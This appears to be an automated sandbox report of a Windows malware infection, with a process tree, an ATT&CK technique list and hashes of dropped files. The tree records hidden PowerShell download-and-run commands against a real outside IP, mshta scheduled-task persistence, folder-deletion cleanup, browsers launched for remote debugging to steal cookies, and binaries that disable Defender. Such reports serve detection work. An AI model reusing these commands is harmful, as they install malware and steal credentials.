C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4756,i,18380068957361190526,7649297083909683343,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4820 /prefetch:86⤵PID:1268
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4844,i,18380068957361190526,7649297083909683343,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4468 /prefetch:86⤵PID:4796
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4924,i,18380068957361190526,7649297083909683343,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4144 /prefetch:86⤵PID:1472
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:5384 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe56fd46f8,0x7ffe56fd4708,0x7ffe56fd47186⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,6521589820018931745,11862348915992948534,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:26⤵PID:4256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,6521589820018931745,11862348915992948534,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:36⤵PID:2600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,6521589820018931745,11862348915992948534,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2440 /prefetch:86⤵PID:5608
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2172,6521589820018931745,11862348915992948534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:16⤵
- Uses browser remote debugging
PID:4584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2172,6521589820018931745,11862348915992948534,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:16⤵
- Uses browser remote debugging
PID:5588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2172,6521589820018931745,11862348915992948534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3844 /prefetch:16⤵
- Uses browser remote debugging
PID:5616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2172,6521589820018931745,11862348915992948534,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:16⤵
- Uses browser remote debugging
PID:6008
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\t2vkn" & exit5⤵
- System Location Discovery: System Language Discovery
PID:4016 -
C:\Windows\SysWOW64\timeout.exetimeout /t 106⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5696
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5112 -s 9444⤵
- Program crash
PID:2264
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085378101\e40f8faca5.exe"C:\Users\Admin\AppData\Local\Temp\1085378101\e40f8faca5.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2264 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 9In0imaIYc0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\YaDrHVvlC.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
PID:4804 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 9In0imaIYc0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\YaDrHVvlC.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4568
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\YaDrHVvlC.hta4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4884 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'G3Y2MGNWLFP14P11FT9FBBZPOCOL8G0T.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1736 -
C:\Users\Admin\AppData\Local\TempG3Y2MGNWLFP14P11FT9FBBZPOCOL8G0T.EXE"C:\Users\Admin\AppData\Local\TempG3Y2MGNWLFP14P11FT9FBBZPOCOL8G0T.EXE"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5132
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1085379021\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
PID:1172 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1085379021\am_no.cmd" any_word4⤵
- System Location Discovery: System Language Discovery
PID:844 -
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3028
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:5292 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5308
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:5452 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5468
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:5616 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5632
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "VSyw7maINbZ" /tr "mshta \"C:\Temp\xo7ZEQplv.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:6000
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\xo7ZEQplv.hta"5⤵
- Checks computer location settings
PID:6016 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6080 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5544
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085400001\ae184ed5c1.exe"C:\Users\Admin\AppData\Local\Temp\1085400001\ae184ed5c1.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5828
-
-
C:\Users\Admin\AppData\Local\Temp\1085401001\d8935727ac.exe"C:\Users\Admin\AppData\Local\Temp\1085401001\d8935727ac.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5792
-
-
C:\Users\Admin\AppData\Local\Temp\1085402001\9198fa4ab8.exe"C:\Users\Admin\AppData\Local\Temp\1085402001\9198fa4ab8.exe"3⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:5408 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5340 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe56fccc40,0x7ffe56fccc4c,0x7ffe56fccc585⤵PID:5292
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2016,i,17098960123637027742,16210544075042109245,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2012 /prefetch:25⤵PID:5900
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1928,i,17098960123637027742,16210544075042109245,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2168 /prefetch:35⤵PID:5616
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2292,i,17098960123637027742,16210544075042109245,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2604 /prefetch:85⤵PID:6076
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3204,i,17098960123637027742,16210544075042109245,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3224 /prefetch:15⤵
- Uses browser remote debugging
PID:5376
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3232,i,17098960123637027742,16210544075042109245,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3396 /prefetch:15⤵
- Uses browser remote debugging
PID:3324
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4572,i,17098960123637027742,16210544075042109245,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4292 /prefetch:85⤵PID:1720
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4676,i,17098960123637027742,16210544075042109245,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3668 /prefetch:15⤵
- Uses browser remote debugging
PID:216
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4524,i,17098960123637027742,16210544075042109245,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4640 /prefetch:85⤵PID:1280
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4544,i,17098960123637027742,16210544075042109245,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4916 /prefetch:85⤵PID:4544
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085403001\0ea2fa1e21.exe"C:\Users\Admin\AppData\Local\Temp\1085403001\0ea2fa1e21.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:736
-
-
C:\Users\Admin\AppData\Local\Temp\1085404001\268e0efb49.exe"C:\Users\Admin\AppData\Local\Temp\1085404001\268e0efb49.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1440 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1440 -s 7204⤵
- Program crash
PID:5264
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085405001\5098d799cd.exe"C:\Users\Admin\AppData\Local\Temp\1085405001\5098d799cd.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2064
-
-
C:\Users\Admin\AppData\Local\Temp\1085406001\d9a0eaee0c.exe"C:\Users\Admin\AppData\Local\Temp\1085406001\d9a0eaee0c.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5640
-
-
C:\Users\Admin\AppData\Local\Temp\1085407001\amnew.exe"C:\Users\Admin\AppData\Local\Temp\1085407001\amnew.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4112 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"4⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5208 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"5⤵
- Executes dropped EXE
PID:5848 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"6⤵
- Executes dropped EXE
PID:5628
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085408001\jROrnzx.exe"C:\Users\Admin\AppData\Local\Temp\1085408001\jROrnzx.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5524 -
C:\Users\Admin\AppData\Local\Temp\1085408001\jROrnzx.exe"C:\Users\Admin\AppData\Local\Temp\1085408001\jROrnzx.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1876
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5524 -s 9684⤵
- Program crash
PID:4800
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085409001\qFqSpAp.exe"C:\Users\Admin\AppData\Local\Temp\1085409001\qFqSpAp.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2688
-
-
C:\Users\Admin\AppData\Local\Temp\1085410001\37df517c12.exe"C:\Users\Admin\AppData\Local\Temp\1085410001\37df517c12.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1280
-
-
C:\Users\Admin\AppData\Local\Temp\1085411001\f4ad9992ae.exe"C:\Users\Admin\AppData\Local\Temp\1085411001\f4ad9992ae.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Identifies Wine through registry keys
- System Location Discovery: System Language Discovery
PID:4832
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3752 -ip 37521⤵PID:4936
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4644 -ip 46441⤵PID:840
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1932 -ip 19321⤵PID:2212
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2320 -ip 23201⤵PID:4892
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5112 -ip 51121⤵PID:2640
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:2380
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:4068
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5288
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1440 -ip 14401⤵PID:5244
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:976
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5524 -ip 55241⤵PID:2172
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Modify Authentication Process
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Authentication Process
1Modify Registry
6Pre-OS Boot
1Bootkit
1Virtualization/Sandbox Evasion
3Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
5Credentials In Files
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.2MB
MD510b1325995983bbbd8e687bb66b01f93
SHA1de07fc69e41711ab35cbb9e262fe8c761cd0372c
SHA25673fe86ea4f23abff50f88e503d58c7fda1c335978408b9da238eca741618e80d
SHA5127c18dd563533f3fc71a3f5ffc15249e8e8ff4f22afc8f1efb56b9411f0be9b1270936c13bd05264f6f78dc536be3b23da40bf74c927060a0069fd9cb250a31d5
-
Filesize
40B
MD5ca4b11b02bfb5fc8793517891b8b97a5
SHA1b11fa1674ec78c9411c643de1fd7781a1b8894bf
SHA256f6d815cf1e9d1d31b99cd34656ea29b649957cc984aa944d48e6a1a6f0eeb043
SHA512c4ed69bbf2e06f3789d421eeca472f5e9380224b3e21fe2f43018f223a863952d043157237ae33ad8f0ec433b10a551fd7b4ca0bb50192286a68b27c9e86dcec
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\505b8c15-cf33-480f-a42a-865916914c06.tmp
Filesize1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
152B
MD5f09c5037ff47e75546f2997642cac037
SHA163d599921be61b598ef4605a837bb8422222bef2
SHA256ba61197fff5ed487084790b869045ab41830bdf6db815503e8e064dd4e4df662
SHA512280bff6eac4b2b4fe515696223f61531f6b507c4c863ad9eef5ab0b1d65d264eba74fb7c9314b6920922142b8ab7605792211fca11a9a9ef0fc2ae995bf4f473
-
Filesize
152B
MD5010f6dd77f14afcb78185650052a120d
SHA176139f0141fa930b6460f3ca6f00671b4627dc98
SHA25680321891fd7f7c02dd4be4e5be09f8e57d49e076c750f8deb300be8f600de2d7
SHA5126e6c9e348e948b946cfb97478698423e1272c4417bc8540e5daa64858e28be8fda5baf28538aee849f8bb409c17a51c60e48a3f1793e3a86cb27edeb32aa30a5
-
Filesize
6KB
MD55d1a80526143bc7965e12cd6944469cd
SHA115c4f8d2be965ea3a9d43c677cce463cf18326b6
SHA256984c04388f2584e2e9769c8ffe60b74b1c88cad6bdbcb166755d05a422b088d4
SHA5129b34f7b04e360ca8508d4400eb4da7eb8f6570ad9bca10a63949f0a45b94c19cc7148e42456d2096f2f8d4ad53484037661458158b9c6bda90b03b7d12f8c114
-
Filesize
1.7MB
MD501c87832191e4ec3561802276e00a9da
SHA15d30e7bc1c0ca52ab683283ca93582f0e114f531
SHA2564c94e2b0301320774d531b2f10755adf18dd3c785d9b62c01a9edba42e869243
SHA512f8e2fb1a2696ad50a0a3cb2b22f576b75a2663304520ba0c91940f540b842d40776a3a73f657202dd74d191fed0bcf877e854852c9df7ac6ed6cb3a1aa465754
-
Filesize
19.4MB
MD5f70d82388840543cad588967897e5802
SHA1cd21b0b36071397032a181d770acd811fd593e6e
SHA2561be1102a35feb821793dd317c1d61957d95475eab0a9fdc2232f3a3052623e35
SHA5123d144eee4a770b5c625e7b5216c20d3d37942a29e08560f4ebf2c36c703831fd18784cd53f3a4a2f91148ec852454ac84fc0eb7f579bb9d11690a2978eb6eef6
-
Filesize
345KB
MD53bc7df7bd28d062f0764332023340d2b
SHA1a602f64795debb0222a704e8f851775dcf21cde3
SHA256713e92e6b5f368bb1208f55f80a3353f8ffa25a97f914fad517032bf923782c9
